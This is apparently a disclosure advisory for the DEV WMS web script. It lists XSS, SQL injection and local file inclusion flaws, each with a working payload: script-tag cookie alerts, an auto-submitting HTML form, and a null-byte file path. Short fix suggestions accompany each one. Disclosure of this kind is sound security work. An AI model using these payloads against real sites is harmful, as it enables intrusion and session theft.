---------------------------------------------------------------- Script : DEV WMS Type : Multiple Vulnerabilities ( Local file inclusion / Cross Site Scripting / SQL Injection ) Alert : High ---------------------------------------------------------------- Discovered by : Khashayar Fereidani Or Dr.Crash My Website : HTTP://FEREIDANI.IR Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com ---------------------------------------------------------------- Script Download : http://dev-wms.sourceforge.net/ ---------------------------------------------------------------- XSS Vulnerability 1 : Variable Sent Method : GET Vulnerable Variable : session Address : http://Example.com/?session=";>><>><script>alert(document.cookie)</script> Solution : filter session variable with htmlspecialchars() function ... ---------------------------------------------------------------- Xss Vulnerability 2 : Variable Sent Method : POST Vulnerable Variable : kluc Address : http://Example.com/index.php?session=0&action=search change example.com to script address in a real site and save as ircrash.html , open file with browser and see your cookie . <html> <head></head> <body onLoad=javascript:document.form.submit()> <form action="http://Example.com/index.php?session=0&action=search"; method="POST" name="form"> <form method="post" onSubmit="return validateprm(this)"><input type="hidden" name="prip" value="true"/><input type="hidden" name="action" value="search"/> <input type="hidden" name="kluc" value=""'''<>>>><script>alert('xss')</script>"> </form> </body> </html> Solution : filter kluc variable with htmlspecialchars() function ... ---------------------------------------------------------------- SQL Injection : Method Of Send : GET Vulnerable Variable : article Address : http://Example.com/index.php?session=0&action=read&click=open&article=[SQL CODE] Solution : Filter danger caracter for article variable ... ---------------------------------------------------------------- Local file inclusion : Method Of Send : GET Vulnerable Variable : step Address : http://Example.com/admin/index.php?start=install&step=file.type%00 Solution : Filter step variable with if function ... ---------------------------------------------------------------- Tnx : God HTTP://IRCRASH.COM ----------------------------------------------------------------
